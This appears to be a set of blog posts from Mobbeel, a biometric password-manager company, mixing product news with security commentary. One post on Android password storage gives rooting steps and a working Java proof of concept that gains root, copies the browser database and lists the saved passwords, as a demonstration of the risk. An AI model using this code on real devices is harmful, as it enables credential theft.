Passwords are not enough


The latest analysis performed by ZoneAlarm warns us of some shocking facts: 79% of internet users use insecure passwords and 16% create passwords from people’s first names. The report says that the most used password is ‘123456’, closely followed by ‘12345’ and ‘123456789’, and, irrespective of which language you use, the next most common password identified was ‘password’ (密码 in Chinese, пароль in Russian).

I’m sure that you have often thought: “Why should I complicate my life thinking up a safe password that I will never be able to remember, if no one is actually interested in my account?”

This same false sense of security is starting to affect a lot of celebrities, who have been suffering leaks of private information from their accounts.

The first real case of ‘cyber-attack’ against a ‘celebrity’ was in 2005, when hackers obtained access to Paris Hilton’s cell phone and distributed private and compromising photos of her. Mikko Hypponen, chief of investigation of F-Secure, an IT security company, said that hackers found the answer to her not-so-secret security question, which was ‘Tinkerbell’, the name of her Chihuahua.

In December 2010, two young amateur hackers gained access to the email accounts and photos of more than 50 ‘celebrities’, including Lady Gaga, Ke$ha and Justin Timberlake. In this case, they only used simple ‘Trojans’ and a lot of patience to break into their accounts.

In March 2011, Vanessa Hudgens, from ‘High School Musical’, reported that some photos had been stolen from her Gmail account.

In April 2011, Wayne Rooney announced on Twitter that his cell phone had been hacked. He reported the incident to Scotland Yard and the resulting investigation confirmed that the newspaper ‘News of the World’ had intercepted his private conversations, which led to them publishing damaging details about the English striker’s infidelity with a prostitute.

In August 2011, the rapper Kreayshawn posted on her blog that her Twitter account had been hacked when some photos of her naked appeared.


In September 2011, Scarlett Johansson and Mila Kunis were victims of phone hacking.
This Wednesday, Christopher Chaney was arrested by the Los Angeles FBI thanks to the ‘Hackerazzi’ operation. The 35-year-old suspect lives in Florida and had illegal access to the accounts of at least 50 famous people, including Christina Aguilera, Scarlett Johansson, Mila Kunis, Simone Harouche and Renee Olstead.

One thing is sure: this kind of hacking against celebrities is not going to disappear. ‘This is on the rise’, said Hypponen. ‘When people see what happened with Scarlett Johansson, you can bet that we are going to find more hackers outside that are trying to do the same with other beautiful actresses’.

Hypponen’s statement leads us to the question: ‘How long before this trend extends beyond famous people?’

Here are a few tips you can follow to safeguard your accounts:

Use a good password manager to keep all your passwords safe.

Use a password generator. It doesn’t matter if you don’t remember your password, because the password manager will remember it for you.

Keep all your private information in a truly safe place, using advanced security techniques such as biometrics (iris, signature recognition).

If all of the above doesn’t convince you, you can always delete all your private information, although that may be a bit complicated due to the amount of sensitive documents that we save on our computers and cell phones these days.

If, like us, you are convinced that your private information should remain private, you can download BioWallet Signature from the Android Market and save all your documents and passwords securely thanks to signature recognition technology. And if you complement it with Biowallet2Browser, you could send your saved accounts from BioWallet to your browser and login from your computer without fear of being hacked.

One final suggestion, don’t take naked pictures of yourself on your phone! :)

Mobbeel closes first round of seed funding


Mobbeel, Extremadura Avante and CDTI have announced that Mobbeel closed its first round of funding totaling €0.5M.

The funding will enable Mobbeel to improve the current state of its biometric recognition technologies (iris, handwritten signature and voice), research and develop new ones such as face and hand geometry recognition as well as positioning the company for continued growth and future investment.

Part of the funding has been received from the Spanish CDTI NEOTEC program. The CDTI (Centre for Industrial Technological Development) is a public company which is affiliated with the Spanish Ministry of Science and Innovation. NEOTEC supports the creation and consolidation of new Spanish technology companies.

Extremadura Avante has also invested in this seed round. Extremadura Avante is a public enterprise of the regional government of Extremadura whose aim is to lend funds as well as make equity investments. Its objective is to support important local businesses in surviving and growing in the economic crisis.

BioWallet2Browser. BioWallet and your Browser now friends!


Mobbeel is pleased to present a new product specially designed to ease and secure your browsing experience on the Internet. It is called BioWallet2Browser and we think you’ll like it.


BioWallet2Browser lets you store your passwords on your phone and use them anywhere with a browser. BioWallet2Browser allows you to surf the web from your desktop browser safely, without having to remember any passwords. Your info is only stored on your phone (inside BioWallet). The browser (only Google Chrome for now) will connect with your phone requesting the user/pass for the site you are visiting, and BioWallet will send this data back to the browser. Easy and secure! You can also store new user/pass information in BioWallet Signature on your phone, directly from the browser.


With BioWallet2Browser you can:

  • Store your passwords on your phone using BioWallet Signature.
  • Access them anywhere you want from a browser.
  • Protect your passwords and sensitive information using biometric encryption on your phone.
  • Save new passwords automatically
  • ...
  • more features


BioWallet2Browser is in Beta and you can try it for free.

All the information is available here.



Let us know what you think about BioWallet2Browser. You can do so through twitter/biowallet, using our userEcho or by mail to info(at)mobbeel(dot)com

Demonstration Video

In this video you can see how BioWallet2Browser works and check out how easy and convenient browsing in a secure way is without having to remember a series of different, long or randomized passwords.


BioWallet Signature v1.0 has been released




We’re pleased to announce that BioWallet Signature has been updated to version 1.0.





The v1.0 version includes these major changes:



  • Attachments. Now you can export/import all your attachments (photos, videos) and create full back-up copies.
  • Protect your exported files with a password.
  • Enable invisible signature. Nobody will see how you sign.
  • Enable/Disable Password Access to the application.
  • Disable your signature's template adaptation once you feel comfortable with your signature.
  • BioWallet2Browser Compatible.


With the new version of BioWallet Signature you can access, save and use all your passwords directly from your browser. Find out more here.

If you have any comments, suggestions, criticism or you want some new features in BioWallet Signature, please let us know. You can do so through twitter/biowallet, using our userEcho or by mail to info(at)mobbeel(dot)com

You can download the application directly from the Android Market, from the download section or scanning the QRCode below …

BioWallet Signature QRCode

Your passwords are not safe in Android

One of the cornerstones of the Android security model is that a user application cannot read or write the files of other applications. To that end, Android uses the Linux permission model and assigns each application its own user ID. This (in theory) prevents third-party applications from accessing our application’s data, and prevents us from accessing theirs.

This model works perfectly as long as there is no “superuser” present on the phone with access to the whole file system (the famous “root”). By default, most of the Android phones that are released to the market don’t have this root user (with some exceptions like the GeeksPhone One), but we have all seen that methods have been developed to gain root access to each and every one of these phones. Lately, it has become such an easy task that, on many phones, installing an application and clicking a button is all you need to get it.

Most of the time, users gain root access to their devices to be able to install customized ROMs, use applications that need access to protected areas of the system, etc., but they don’t realize the security risks this involves.

One of the latest security risks to come to light is that several applications, including the email client and the browser, store user passwords without any kind of encryption. They do so because they trust the default Android security model to ensure that no other application will be able to read or write these files. However, as we have seen, gaining root access on most current devices is so easy that this security measure is clearly insufficient.

Some people may think that this is just an oversight or laziness on the part of these applications’ programmers and that it can be solved simply by encrypting that information, but it is not so easy. In fact, it is a trade-off between convenience and security. To protect these passwords we would need an additional password to encrypt/decrypt them. And… how is this password stored? In plain text? Encrypted? If we encrypt it, we would again need a new password, but… what are we going to do with the password that encrypts the password that encrypts the passwords? In the end, the user has to enter something that cannot be stored on the system and that only he/she knows (or a biometric feature like the ones that BioWallet requires).

Several methods to exploit this security flaw have been published on different blogs. Most of them require a rooted phone, connecting the phone to a computer and activating debug mode, extracting the database from the phone and opening it with specific tools, etc. This gives less experienced users a false sense of security, because they think:

  1. My phone is not rooted and so it is safe.
  2. My phone is rooted, but to find out my passwords somebody would have to steal it, and the attacker would have to be almost an expert hacker.

Actually, the security risk is greater than what most users think, because:

  1. If your phone is not rooted but it is lost or stolen, gaining root access is a matter of minutes even for a non-expert person.
  2. If your phone is already rooted, nobody needs to steal it and connect it to a computer. Every application you install could be a malicious one that accesses your passwords and sends them anywhere without you noticing.

To prove that this is a real security risk, we are now going to show how to gain root access to a mobile phone in a matter of seconds, and we are going to present a sample application that, in a few lines of code, is able to access the passwords stored by the browser and display them on the screen.

How to get root access on the Motorola Droid

Suppose somebody has got hold of my Motorola Droid, which I consider very secure because I have never activated root access. The attacker only has to:

  1. Download and install UniversalAndroot directly from the phone (there are many more; this is just one of the best known).
  2. Open UniversalAndroot and click the “Go Root” button.
  3. That’s all! The user is now root on our phone and can access all the passwords that have been stored in plain text.

PasswordsExploit

If we have already rooted our own phone, the risk is even higher, because a malicious app might request superuser permission under a different pretext and, if we allow it, the application could access the stored passwords and send them anywhere without our consent. To show that it is very easy to create such an application and that you don’t need to be a security expert, we present a sample that, in a few lines, is able to access your passwords and display them on the screen (a real malicious application of course wouldn’t display them; it would silently send them off the phone).

package com.mobbeel.passwordsexploit;
 
import java.io.DataOutputStream;
import java.io.IOException;
 
import android.app.ListActivity;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.os.Bundle;
import android.widget.ListAdapter;
import android.widget.SimpleCursorAdapter;
import android.widget.Toast;
 
public class PasswordsExploitActivity extends ListActivity {
 
	@Override
	public void onCreate(Bundle savedInstanceState) {
		super.onCreate(savedInstanceState);
 
		try {
			//Get root access
			Process process = Runtime.getRuntime().exec("su");
			DataOutputStream os = new DataOutputStream(process.getOutputStream());
			//copy the browser database to a readable directory
			os.writeBytes("cp /data/data/com.android.browser/databases/webview.db /tmp \n");
			//change the permissions to be readable by everybody
			os.writeBytes("chmod 666 /tmp/webview.db \n");
			os.writeBytes("exit\n");
			os.flush();
			process.waitFor();
 
			//end of root commands. Now just open the database and query as usual
			SQLiteDatabase db = SQLiteDatabase.openDatabase("/tmp/webview.db", null, SQLiteDatabase.OPEN_READONLY);
			//SELECT * FROM password;
			Cursor c = db.query("password", null, null,	null, null, null, null);
			startManagingCursor(c);
 
			//display Usernames and Passwords on a list
			ListAdapter adapter = new SimpleCursorAdapter(this,
					android.R.layout.two_line_list_item, c,
					new String[] { "username", "password" },
					new int[] { android.R.id.text1, android.R.id.text2 });
			setListAdapter(adapter);
 
 
		} catch (IOException e) {
			Toast.makeText(this, "This app needs root access.", Toast.LENGTH_SHORT).show();
			e.printStackTrace();
		} catch (InterruptedException e) {
			Toast.makeText(this, "This app needs root access.", Toast.LENGTH_SHORT).show();
			e.printStackTrace();
		}
 
	}
}

When we execute this application, if we have already rooted our phone, it will request permission to execute commands as a superuser. We should never give this permission to applications unless we absolutely trust them.

Superuser request

If we grant this permission, the application reads the usernames/passwords stored by the browser and displays them in a list.

User's password list

In conclusion, here are some recommendations to keep your passwords safe:

  1. Don’t root your phone unless you are an experienced user and you fully understand the security risks you are taking on.
  2. If you have already rooted your phone, don’t grant superuser permission to third-party applications that request it unless you absolutely trust them.
  3. Don’t use the option to remember passwords in the browser or any other application that doesn’t protect them with another password (or a biometric feature like BioWallet). You should follow this advice not only for the Android browser, but also for your computer browsers, instant messaging clients, …. As a rule of thumb, any application that can access stored passwords without asking you to identify yourself is not storing them securely.
  4. Use a reliable password manager to store your sensitive information.

Alcatel OT-980 and BioWallet Signature now together


We are pleased to announce that Mobbeel and Alcatel have come to an agreement so that BioWallet Signature is pre-installed on the new Android device that Alcatel is going to put on the market, the Alcatel OT-980.

With BioWallet you can keep all your sensitive information safe. Don’t worry if the device is lost or stolen: no one but you can access it, using your signature.

The new Alcatel comes with the Android 2.1 Eclair operating system, and its main features are:

  • 2.8” touch screen
  • Full QWERTY keypad
  • Compatibility with 2G / 3G / Wi-Fi mobile networks
  • GPS navigation
  • 2 MP digital camera with sensor ensuring superior image quality
  • Media player with 3.5 mm audio jack
  • Electronic compass
  • Internal memory extendable up to 16GB
  • Long-life battery with 6h talk time in 3G

The OT-980 is currently available in the UK and will be available in November in France, Spain and Germany.

The terms of the agreement between Alcatel and Mobbeel will let you update BioWallet Signature automatically through the Android Market.

Remember, with BioWallet You are the Key!

Stay tuned! The best is yet to come.

Mobbeel will be giving a talk at Biometrics Exhibition and Conference 2010


Biometric Exhibition Conference 2010

Mobbeel has been invited to give a talk at Biometric Exhibition Conference 2010 in London in October. You can see the event’s programme here.

Our CEO, José Luis Huertas, will talk about mobile biometry. His talk “Mobile biometry: Strengthening the weakest link” will discuss the use of biometrics to secure and reinforce security systems in a mobile environment.

We will be part of MOBIO’s panel, one of the exhibitors of the Conference.

If you want to organize a meeting with Mobbeel during the event please contact us here or through twitter/biowallet.

About Biometric Exhibition Conference 2010
This year’s main conference topics:

  • Biometric citizen identification issues
  • Biometrics at the border
  • Biometrics within military operations
  • Automated border control
  • Emerging biometric applications
  • Enhancing law enforcement – biometrics in action


About MOBIO

MOBIO is an FP7 European research project (FP7-2007-ICT-1) planned over 3 years and started in January 2008. The goal of MOBIO is to develop new mobile services secured by biometric authentication means. Scientific and technical objectives include robust-to-illumination face authentication, robust-to-noise speaker authentication, joint bi-modal authentication, model adaptation and scalability.

Mobbeel presents its new website


Hi everyone,

We are more than happy to present to you our newly redesigned website, which is available in both English and Spanish.

You can access information on our technology as well as our products, and learn more about the company, its advisors and its partner program.

Send us feedback about the product directly with the userEcho widget on the BioWallet page.

We’re working very hard to deliver cutting-edge biometric technologies for mobile devices… so stay tuned! There are some surprises to come…

Remember you can contact us using this page or Twitter, or send feedback using our userEcho channel.

Mobbeel one of the protagonists of Marca Extremadura


Somos Extremadura

Mobbeel is proud to be part of this campaign and thereby to contribute to improving the image of Extremadura.

The new campaign is now available at todossomosextremadura; 19 interviews have been recorded to describe personal and professional experiences in Extremadura.

Click here to view the video in todossomosextremadura about Mobbeel.

What is Marca Extremadura?

Extremadura is leading a process involving significant structural changes that are fuelling a boom in the region. This growth, alongside the dynamic nature of the Extremadurean people and the constant innovation and excellence as the cornerstones of progress, is drawing attention to the region as one of the most attractive places to invest.


In this context, the image of the region has been repositioned and transformed by the Extremadura Brand, which since 2006 has been based on the passion and clear identity that have seen it become the hallmark of Extremadura.
This has firmly established the region as a quality, trustworthy and innovative destination. The Extremadura Brand lends a clear and positive reputation to the region, and its value opens up Extremadura to the rest of the world and vice versa. In an increasingly competitive and globalised world, the importance of an image portraying Extremadura as a strong region is an extra bonus in terms of competitiveness in exports and is also an excellent tool for driving internationalisation.

Marca Extremadura is the global project that combines collective projects and the participation of agencies that wish to make a prominent contribution to the wellbeing of society as a whole. Contributions are active and voluntary, generating an explicit commitment which stems from their support and involvement in the process of repositioning Extremadura’s image.

Companies, institutions, agencies and civilians play an active role in overcoming the challenges involved in making the Extremadura brand strong.

BioWallet Signature v0.5.2 has been released






The v0.5.2 version includes these changes:



  • New translations added. Enjoy it now in English, Spanish, French, Dutch, German, Chinese, Polish, Russian and Italian.
  • New credit card layout. New design... check out here
  • Attachments. Take a photo and attach it directly from a record.
  • No more "System Tools" permission needed.
  • New SplashID record. SplashID "Phone Numbers" record importing supported.
  • Enrollment/Authentication. Revamped Enrollment and Authentication processes. Now it is a completely intuitive process.
  • Sound Notifications. Now you can completely disable sound notifications in app's settings.
  • Bugs fixed from previous versions



You can download the application directly from the Android Market (searching "biowallet") or from its page.

If you have any comments, suggestions or criticism, or you are missing some feature in BioWallet, please let us know. You can do so through twitter/biowallet, using our userEcho or by mail to info(at)mobbeel(dot)com